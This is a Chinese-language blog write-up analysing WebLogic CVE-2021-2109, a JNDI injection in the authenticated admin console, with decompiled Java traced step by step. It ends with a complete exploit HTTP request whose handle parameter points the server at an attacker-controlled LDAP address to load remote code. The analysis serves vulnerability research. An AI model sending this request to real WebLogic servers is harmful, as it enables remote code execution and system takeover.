WebLogic CVE-2021-2109 JNDI RCE

Y4er 收录于类别代码审计和系列 Weblogic

2021-01-27 2021-01-27 约 1277 字预计阅读 3 分钟

系列 - Weblogic

警告

本文最后更新于 2021-01-27，文中内容可能已过时。

console的JNDI注入，需要登录。

# 复现

weblogic 14.1.1
jdk8u112
JNDI-Injection-Exploit

# 分析

consolejndi.portal中存在JNDIBindingPageGeneral jndi绑定的东西

具体的处理逻辑在/PortalConfig/jndi/jndibinding.portlet。

在com.bea.console.actions.jndi.JNDIBindingAction#execute中就是处理逻辑

直接lookup了，就是要先过serverMBean != null的条件。

在MBeanUtils.getAnyServerMBean(serverName)中

有一个lookupServer()，使用的是动态代理调用的，跟进到weblogic.management.jmx.MBeanServerInvocationHandler#invoke

其中method值为

lookupServer就在这个类中weblogic.management.configuration.DomainMBeanImpl#lookupServer

用动态调试把存在的serverBean弄出来，让传入的serverName等于他满足dowhile条件就能使返回的serverBean不为空了，即AdminServer。

现在serverBean不为空了，就要看jndi lookup的地址是否可控。

lookup的值有以下逻辑

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
JndiBindingHandle bindingHandle = (JndiBindingHandle)this.getHandleContext(actionForm, request, "JNDIBinding");
String context = bindingHandle.getContext();
String bindName = bindingHandle.getBinding();
String serverName = bindingHandle.getServer();
String prefix = context;
String suffix = bindName;
if (prefix.length() > 0 && suffix.length() > 0) {
prefix = prefix + ".";
}
Object boundObj = c.lookup(prefix + suffix)

前缀和后缀以及serverName都是从bindingHandle获取的，即JndiBindingHandle类，跟进bindingHandle.getContext()看下。

调用自身getComponent方法

1
2
3
    protected String getComponent(int index) {
        return this.getComponents()[index];
    }

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
private String[] getComponents() {
    if (this.components == null) {
        String serialized = this.getObjectIdentifier();
        ArrayList componentList = new ArrayList();
        StringBuffer currentComponent = new StringBuffer();
        boolean lastWasSpecial = false;

        for(int i = 0; i < serialized.length(); ++i) {
            char c = serialized.charAt(i);
            if (lastWasSpecial) {
                if (c == '0') {
                    if (currentComponent == null) {
                        throw new AssertionError("Handle component already null : '" + serialized + '"');
                    }

                    if (currentComponent.length() > 0) {
                        throw new AssertionError("Null handle component preceeded by a character : '" + serialized + "'");
                    }

                    currentComponent = null;
                } else if (c == '\\') {
                    if (currentComponent == null) {
                        throw new AssertionError("Null handle followed by \\ : '" + serialized + "'");
                    }

                    currentComponent.append('\\');
                } else {
                    if (c != ';') {
                        throw new AssertionError("\\ in handle followed by a character :'" + serialized + "'");
                    }

                    if (currentComponent == null) {
                        throw new AssertionError("Null handle followed by ; : '" + serialized + "'");
                    }

                    currentComponent.append(';');
                }

                lastWasSpecial = false;
            } else if (c == '\\') {
                if (currentComponent == null) {
                    throw new AssertionError("Null handle followed by \\ : '" + serialized + "'");
                }

                lastWasSpecial = true;
            } else if (c == ';') {
                String component = currentComponent != null ? currentComponent.toString() : null;
                componentList.add(component);
                currentComponent = new StringBuffer();
            } else {
                if (currentComponent == null) {
                    throw new AssertionError("Null handle followed by  a character : '" + serialized + "'");
                }

                currentComponent.append(c);
            }
        }

        if (lastWasSpecial) {
            throw new AssertionError("Last character in handle is \\ :'" + serialized + "'");
        }

        String component = currentComponent != null ? currentComponent.toString() : null;
        componentList.add(component);
        this.components = (String[])((String[])componentList.toArray(new String[componentList.size()]));
    }

    return this.components;
}

整体逻辑就是用;号分割，相当于全部可控，造成jndi注入。

最后捋一下整体条件

;号隔开jndi地址
serverName必须为AdminServer

# exp

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://172.16.0;1:1389/aew0xy;AdminServer%22) HTTP/1.1
Host: 172.16.1.134:7001
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.1.134:7001/console/login/LoginForm.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSION=8Xk3Y9pCjDLlUARpWoE3rhia67n0LKY5xuTzTHfWxz1ITlNDOob1!1254895310
Connection: close